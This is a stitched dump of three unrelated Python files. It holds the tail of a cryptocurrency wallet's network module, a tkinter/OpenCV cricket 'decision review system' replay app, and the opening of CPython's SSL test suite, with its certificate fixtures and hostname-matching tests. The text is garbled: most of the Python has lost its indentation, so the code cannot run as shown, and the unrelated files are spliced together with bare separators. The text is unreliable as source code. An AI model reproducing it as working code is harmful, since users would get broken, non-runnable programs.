interface.blockchain = b
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
tip = max([x.height() for x in self.blockchains.values()])
if tip >=0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.request_header(interface, 0)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain==b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise BaseException('Server did not answer')
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
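# Illustrative sketch, not part of the original module: the external API listed
# in the Network docstring, roughly as a GUI or daemon would drive it.  The
# config argument and the no-op callback are placeholders.
def _demo_network_usage(config):
    net = Network(config)               # connects to a default/random server
    net.start()                         # DaemonThread.start() -> run() loop
    net.register_callback(lambda event, *args: None, ['status', 'updated'])
    if net.is_connected():
        print('server height', net.get_server_height())
    net.stop()                          # run() then calls stop_network()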
|
main.py
|
import tkinter
import cv2 # pip install opencv-python
import PIL.Image # pip install pillow
import PIL.ImageTk # pip install pillow
from functools import partial
import threading
import time
import imutils
stream= cv2.VideoCapture('Decision Review System/clip.mp4')
flag = True
def play(speed):
global flag
print(f"You clicked on play. Speed is {speed}")
    # Step the video forward or backward by 'speed' frames (negative values rewind)
frame1=stream.get(cv2.CAP_PROP_POS_FRAMES)
stream.set(cv2.CAP_PROP_POS_FRAMES, frame1 + speed)
grabbed, frame = stream.read()
if not grabbed:
exit()
    frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0, image=frame, anchor= tkinter.NW)
if flag:
        canvas.create_text(132, 29, fill="red", font="Times 27 bold", text="Decision Pending")
flag = not flag
def pending(decision):
    frame = cv2.cvtColor(cv2.imread("Decision Review System/pending.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor= tkinter.NW)
time.sleep(1)
    frame = cv2.cvtColor(cv2.imread("Decision Review System/sponsor.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor= tkinter.NW)
time.sleep(1.5)
if decision=='out':
        decisionImg = "Decision Review System/out.png"
else:
        decisionImg = "Decision Review System/img_not_out.png"
frame = cv2.cvtColor(cv2.imread(decisionImg), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor= tkinter.NW)
def out():
thread = threading.Thread(target=pending, args=("out",))
thread.daemon = 1
thread.start()
print("Player is out!")
def not_out():
thread = threading.Thread(target=pending, args=("not out",))
thread.daemon = 1
thread.start()
print("Player is not out!")
# Width and height of our main screen
SET_WIDTH = 650
SET_HEIGHT = 368
# Tkinter GUI starts here
window = tkinter.Tk()
window.title("Third Umpire Decision Review System")
cv_img = cv2.cvtColor(cv2.imread(
    "Decision Review System/welcome.png"), cv2.COLOR_BGR2RGB)
canvas = tkinter.Canvas(window, width=SET_WIDTH, height=SET_HEIGHT)
photo = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas = canvas.create_image(0, 0, anchor=tkinter.NW, image=photo)
canvas.pack()
# Buttons to control playback
btn = tkinter.Button(window, text="<< Previous (FAST)",
width=50, command=partial(play, -25))
btn.pack()
btn = tkinter.Button(window, text="<< Previous (SLOW)",
width=50, command=partial(play, -2))
btn.pack()
btn = tkinter.Button(window, text="Next (FAST)>>",
width=50, command=partial(play, 25))
btn.pack()
btn = tkinter.Button(window, text="Next (SLOW)>>",
width=50, command=partial(play, 2))
btn.pack()
btn = tkinter.Button(window, text="Give Out", width=50, command=out)
btn.pack()
btn = tkinter.Button(window, text="Give Not Out", width=50, command=not_out)
btn.pack()
window.mainloop()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
import warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import asyncore
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
    def seclevel_workaround(*ctxs):
        """Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
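# A minimal sketch of how has_tls_version() is typically consumed (the guarded
# test body is hypothetical):
#
#     if has_tls_version('TLSv1_3'):
#         ...  # exercise TLS 1.3 specific behaviour
#
# This covers both the compile-time flag (ssl.HAS_TLSv1_3) and any runtime
# crypto-policy limits picked up through the default SSLContext.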
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
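# Hedged usage sketch (the decorator is real, the decorated method below is
# hypothetical):
#
#     @requires_tls_version('TLSv1_3')
#     def test_something_tls13(self):
#         ...
#
# The wrapped test is skipped with a clear message whenever the requested
# protocol version is unavailable in the linked OpenSSL build.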
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
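# ignore_deprecation is applied as a decorator to tests that exercise
# deprecated APIs (e.g. ssl.wrap_socket() and ssl.match_hostname() below),
# silencing only DeprecationWarning so that other warnings still surface.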
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
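# test_wrap_socket() rebuilds the old ssl.wrap_socket() convenience API on top
# of SSLContext: the client side defaults server_hostname to
# SIGNED_CERTFILE_HOSTNAME, and CERT_NONE disables hostname checking. A
# minimal, illustrative call mirroring the tests below:
#
#     ss = test_wrap_socket(socket.socket(socket.AF_INET),
#                           cert_reqs=ssl.CERT_NONE)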
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
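# Typical pattern built on testing_context(), sketched from the tests below
# (ThreadedEchoServer is assumed to be defined elsewhere in this module):
#
#     client_context, server_context, hostname = testing_context()
#     with ThreadedEchoServer(context=server_context) as server:
#         with client_context.wrap_socket(socket.socket(),
#                                         server_hostname=hostname) as s:
#             s.connect((HOST, server.port))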
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
support.check_disallow_instantiation(self, _ssl.Certificate)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.OP_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'{protocol!r} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
self.assertEqual(
f'ssl.{version!r} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
        # wildcards only match when they are the only thing
        # in the left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
